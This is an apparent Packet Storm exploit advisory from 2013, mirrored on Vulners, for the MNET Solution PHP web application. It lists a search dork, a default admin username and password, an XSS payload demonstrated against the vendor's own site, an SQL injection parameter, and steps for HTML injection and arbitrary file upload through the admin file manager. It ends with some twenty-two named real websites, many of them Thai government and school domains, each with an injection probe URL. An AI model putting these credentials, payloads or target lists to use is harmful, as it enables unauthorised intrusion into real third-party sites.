Lucene search
+L

MNET Solution XSS / SQL Injection / File Upload

🗓️ 19 Oct 2013 00:00:00Reported by DevilScreaMType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

MNET Solution Multiple Vulnerabilities including XSS, SQL Injection, and Arbitrary File Uploa

Code
`#Title : MNET Solution Multiple Vulnerabilities  
  
#Author : DevilScreaM  
  
#Date : 10/19/2013  
  
#Category : Web Applications  
  
#Type : PHP  
  
#Vendor : http://mnet.co.th  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Vulnerabillity : XSS, SQL Injection, HTML Injection, Arbitrary File Upload  
  
#Dork : inurl:webboard.php?option=answers  
  
  
Default Admin Password  
  
http://site-target/siteadmin/  
  
Username : superadmin  
Password : jocho  
  
====================================================================================================  
  
Cross Site Scripting  
  
http://site-target/[PATH]/subindex.php?page=search&kword=[XSS]  
  
Example at Web Vendor  
  
http://mnet.co.th/2012/th/main/subindex.php?page=search&kword=<script>alert('DevilScreaM')</script>  
  
====================================================================================================  
  
SQL Injection Vulnerability  
  
Vulnerable at 'webboard.php'  
  
http://site-target/[PATH]/webboard.php?option=answers&qNo=[SQLI]  
  
====================================================================================================  
  
HTML Injection  
  
Register to WebBoard, after Register, Create New Post  
  
Go to http://site-target/[PATH]/webboard.php?#post  
  
  
#NOTE  
  
Register Page : http://site-target/subindex.php?page=member&task=new  
  
  
====================================================================================================  
  
Arbitrary File Upload  
  
1. Login to Page Admin  
  
2. After Login, go to http://site-target/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php  
  
3. Click Upload, And Upload Your HTML  
  
4. Result Upload at  
  
http://site-target/upfile/[YOURFILE].html  
  
http://site-target/images/[YOURFILE].html  
  
======================================================================================================  
  
Example Target  
  
http://tarbiah.ac.th/main/webboard.php?option=answers&qNo=20'  
http://pasayyawo.go.th/main/webboard.php?option=answers&qNo=9'  
http://anwarulislam.ac.th/main/webboard.php?option=answers&qNo=10'  
http://pujud.go.th/main/webboard.php?option=answers&qNo=20'  
http://npm.ac.th/en/webboard.php?option=answers&qNo=3'  
http://klongchanak.go.th/2011/main/webboard.php?option=answers&qNo=20'  
http://alfatihah.ac.th/main/webboard.php?option=answers&qNo=20'  
http://halal.or.th/th/main/webboard.php?option=answers&qNo=20'  
http://kpgt.co.th/en/main/webboard.php?option=answers&qNo=20'  
http://startec.co.th/main/webboard.php?option=answers&qNo=13'  
http://worldwidestudy.co.th/main/webboard.php?option=answers&qNo=4'  
http://mrhalalfood.co.th/th/main/webboard.php?option=answers&qNo=1'  
http://royalthaitour.com/ar/main/webboard.php?option=answers&qNo=2'  
http://prosperfilms.com/en/main/webboard.php?option=answers&qNo=8'  
http://halalscience.org/en/main/webboard.php?option=answers&qNo=2'  
http://satelliteguidemag.com/main/webboard.php?option=answers&qNo=13'  
http://jintakanitlanna.com/main/webboard.php?option=answers&qNo=63'  
http://muslimchonburi.com/2011/main/webboard.php?option=answers&qNo=23'  
http://fulfilacademy.com/main/webboard.php?option=answers&qNo=43'  
http://st-arabian.com/main/webboard.php?option=answers&qNo=43'  
http://thaipaki.com/main/webboard.php?option=answers&qNo=47'  
http://ben-socks.com/th/main/webboard.php?option=answers&qNo=23'  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation